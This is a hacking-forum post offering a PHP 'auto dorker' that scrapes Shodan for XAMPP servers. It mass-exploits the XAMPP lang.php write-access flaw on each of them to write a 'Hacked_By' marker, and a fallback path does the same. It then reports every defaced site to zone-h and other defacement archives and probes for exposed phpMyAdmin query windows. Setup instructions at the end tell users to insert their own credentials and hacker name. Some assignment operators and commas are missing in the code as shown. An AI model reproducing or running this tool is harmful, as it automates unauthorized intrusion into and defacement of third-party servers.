facebook facebook twitter rss

[tool] Auto Dorker in shodan + exploiter xampp write access vulnerability

Author: Tu5b0l3d , Published: 25-07-2015

<?php

//exploit  http://indocyberarmy.blogspot.sg/2013/10/xampp-write-access-vulnerability.html

cover();
$username ="Tu5b0l3d";
$password "********";
$dork "xampp";

function 
save($data){
        
$fp = @fopen("pulen-shodan.htm""a") or die("cant open file");
        
fwrite($fp$data);
        
fclose($fp);
}
$post = array(
"username" => "$username",
"password" => "$password",
"grant_type" => "password",
"continue" => "https%3A%2F%2Faccount.shodan.io%2F",
"login_submit" => "Log+in"
);

$curl curl_init("https://account.shodan.io/login");
    
curl_setopt($curlCURLOPT_HEADER1);
    
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_SSL_VERIFYPEER0);
    
curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);
    
curl_setopt($curl,CURLOPT_TIMEOUT,10);
    
curl_setopt($curl,CURLOPT_USERAGENT"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
    
curl_setopt($curl,CURLOPT_POST,true);
    
curl_setopt($curl,CURLOPT_POSTFIELDS,$post);
    
curl_setopt($curlCURLOPT_AUTOREFERERtrue);
    
curl_setopt($curlCURLOPT_COOKIEJAR"coker_log");
    
curl_setopt($curlCURLOPT_COOKIEFILE"coker_log");
    
$result curl_exec($curl);


            
                if(
preg_match('#Logout#i',$result)){
                    echo 
"-> sukses Loginn";
                    echo 
"-> Lanjut kita cari siten";
for(
$a=1;$a<7;$a++){
$curl curl_init("https://www.shodan.io/search?query=$dork&page=$a");
    
curl_setopt($curlCURLOPT_HEADER1);
    
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_SSL_VERIFYPEER0);
    
curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);
    
curl_setopt($curl,CURLOPT_TIMEOUT,10);
    
curl_setopt($curl,CURLOPT_USERAGENT"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
    
curl_setopt($curlCURLOPT_AUTOREFERERtrue);
    
curl_setopt($curlCURLOPT_COOKIEJAR"coker_log");
    
curl_setopt($curlCURLOPT_COOKIEFILE"coker_log");
    
$get curl_exec($curl);

        echo 
"-> Page $ann";
    
$pecah explode('<div class="ip">',$get);
        for(
$i=1;$i<=count($pecah);$i++){
            
preg_match('/(.*?)">/'$pecah[$i], $sites);
                    
$sites $sites[1];
                    
$site_bener str_replace('<a href="',""$sites);
                    echo 
$site_bener."n";
                    
$simpen "$site_bener@!";
        
$fp = @fopen("target-shodan.htm""a") or die("cant open file");
        
fwrite($fp$simpen);
        
fclose($fp);
    }
}
    echo 
"-> Kita Mulai Scanning..n";
    
$buka=fopen("target-shodan.htm","r");
$size=filesize("target-shodan.htm");
$baca=fread($buka,$size);
$sites explode("@!"$baca);
    foreach(
$sites as $url){
        
scanning($url);
    }

                }
                    else{
                        echo 
"-> Try Again!";
                    }
        
                
curl_close($curl);

function 
cover(){
    echo 
"nn########## IndoXploit Coders Team ##########n";
    echo 
"#########  Thx To: Sohai, Shor7cut #########nn";
}

function 
scanning($urlq){
    
$hacker "Tu5b0l3d";
    echo 
"-> $urlq";
                echo 
"n";
                echo 
"-> Wait...";
        
                        
$ch curl_init("$urlq/xampp/lang.php?Hacked_By_$hacker");
                        
curl_setopt($chCURLOPT_POSTtrue);
                        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                        
curl_setopt($chCURLOPT_COOKIEFILEcoker_log);
                        
curl_setopt($chCURLOPT_COOKIEJARcoker_log);
                        
$postResult2 curl_exec($ch);
                        
curl_close($ch);

                        
$ch4 "$urlq/xampp/lang.tmp";
                        
$file = @file_get_contents($ch4);
    
                    if(
preg_match('#Hacked#i'$file)){
                    echo 
"n";
                    echo 
"-> berhasil: ";
                    echo 
$urlq."/xampp/lang.tmp";
save($urlq."/xampp/lang.tmp<br>");
echo 
"n";
echo 
"-> Zone-h: ";
                    
$ch8 curl_init ("http://www.zone-h.com/notify/single");
                        
curl_setopt ($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt ($ch8CURLOPT_POST1);
                        
curl_setopt ($ch8CURLOPT_POSTFIELDS"defacer=ID-IM&domain1=$ch4&hackmode=1&reason=1");  // here put ur name on zone-h
                        
                        
if (preg_match ("/color="red">OK</font></li>/i"curl_exec ($ch8))){
                                echo  
" Ok  "."n";
                        }else{
                        echo 
" No"."n"; }


                    echo 
"-> Security-Exploded: ";
                    
$ch8 curl_init ("http://www.security-exploded.org/mass_act.html");
                        
curl_setopt ($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt ($ch8CURLOPT_POST1);
                        
curl_setopt ($ch8CURLOPT_POSTFIELDS"hacker=$hacker&team=IndoXploit Coders Team&url=$ch4&poc=20");
                        
curl_setopt($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt($ch8CURLOPT_COOKIEFILE,"coker_log");
                        
$ps curl_exec($ch8);      
                        if (
preg_match("#SUCCESS#is"$ps)){
                                echo  
" ngk tau "."n";
                        }else{
                        echo 
" ngk tau2 "."n"; }
                        echo 
"-> Zone-db: ";
                            
$post = array(
"hacker" => "$hacker",
"team" => "IndoXploit",
"url" => "$ch4",
"poc" => "Other Web Application Bug",
"key" => "kucing",
"secret" => "tai",
);
    
$curl curl_init ("http://zone-db.com/notify_act.php");
    
curl_setopt($curlCURLOPT_HEADER1);
    
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_SSL_VERIFYPEER0);
    
curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);
    
curl_setopt($curl,CURLOPT_TIMEOUT,10);
    
curl_setopt($curl,CURLOPT_USERAGENT"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
    
curl_setopt($curlCURLOPT_AUTOREFERERtrue);
    
curl_setopt($curlCURLOPT_COOKIEJAR"coker_log");
    
curl_setopt($curlCURLOPT_COOKIEFILE"coker_log");
    
$ps2 curl_exec($curl);

                        if (
preg_match("#added#is"$ps2)){
                                echo  
" Sukses"."n";
                        }else{
                        echo 
" ngk sukses "."n"; }
                            
curl_close ($curl);

                        echo 
"-> Cek PhpmyAdmin: ";
                         
$ch2 "$urlq/phpmyadmin/querywindow.php";
                         
$file3 = @file_get_contents($ch2);
                           if(
preg_match('#focus_querywindow#i'$file3)){
                            echo 
"Oknn";
                            
save($urlq."/phpmyadmin/querywindow.php<br>");

                        }
                        else {
                            echo 
"Nonn";
                        }
                }
                else
                {
                echo 
"n";
                echo 
"-> gagal di xampp/lang";
                echo 
"n-> coba di secutityn";

                 
$ch curl_init("$urlq/security/lang.php?Hacked_By_$hacker");
                        
curl_setopt($chCURLOPT_POSTtrue);
                        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                        
curl_setopt($chCURLOPT_COOKIEFILEcoker_log);
                        
curl_setopt($chCURLOPT_COOKIEJARcoker_log);
                        
$postResult2 curl_exec($ch);
                        
curl_close($ch);

                        
$ch5 "$urlq/security/lang.tmp";
                        
$file2 = @file_get_contents($ch5);

                         if(
preg_match('#Hacked#i'$file2)){
                    echo 
"-> berhasil: n";
                    echo 
$urlq."/security/lang.tmpn";
                    
save($urlq."/security/lang.tmp<br>");
                    echo 
"-> Zone-h: ";
                    
$ch8 curl_init ("http://www.zone-h.com/notify/single");
                        
curl_setopt ($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt ($ch8CURLOPT_POST1);
                        
curl_setopt ($ch8CURLOPT_POSTFIELDS"defacer=ID-IM&domain1=$ch5&hackmode=1&reason=1");  // here put ur name on zone-h
                        
                        
if (preg_match ("/color="red">OK</font></li>/i"curl_exec ($ch8))){
                                echo  
" Ok  "."n";
                        }else{
                        echo 
" No"."n"; }

                    echo 
"-> Security-Exploded: ";
                    
$ch8 curl_init ("http://www.security-exploded.org/mass_act.html");
                        
curl_setopt ($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt ($ch8CURLOPT_POST1);
                        
curl_setopt ($ch8CURLOPT_POSTFIELDS"hacker=$hacker&team=IndoXploit Coders Team&url=$ch5&poc=20");
                        
curl_setopt($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt($ch8CURLOPT_COOKIEFILE,"coker_log");
                        
$ps curl_exec($ch8);      
                        if (
preg_match("#SUCCESS#is"$ps)){
                                echo  
" ngk tau "."n";
                        }else{
                        echo 
" ngk tau2 "."n"; }
                        echo 
"-> Zone-db: ";
                            
$post = array(
"hacker" => "$hacker",
"team" => "IndoXploit",
"url" => "$ch5",
"poc" => "Other Web Application Bug",
"key" => "kucing",
"secret" => "tai",
);
    
$curl curl_init ("http://zone-db.com/notify_act.php");
    
curl_setopt($curlCURLOPT_HEADER1);
    
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_SSL_VERIFYPEER0);
    
curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);
    
curl_setopt($curl,CURLOPT_TIMEOUT,10);
    
curl_setopt($curl,CURLOPT_USERAGENT"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
    
curl_setopt($curlCURLOPT_AUTOREFERERtrue);
    
curl_setopt($curlCURLOPT_COOKIEJAR"coker_log");
    
curl_setopt($curlCURLOPT_COOKIEFILE"coker_log");
    
$ps2 curl_exec($curl);

                        if (
preg_match("#added#is"$ps2)){
                                echo  
" Sukses"."nn";
                        }else{
                        echo 
" ngk sukses "."nn"; }
                            
curl_close ($curl);

                    }
                    else{
                        echo 
"-> gagal di securitynn";
                    }
                }
}

?>



first, you must register in shodan.io to get username n' password
change $username, $password, $dork, $hacker


## IndoXploit ## ## Hacker-Newbie.org ##

Like us on Facebook :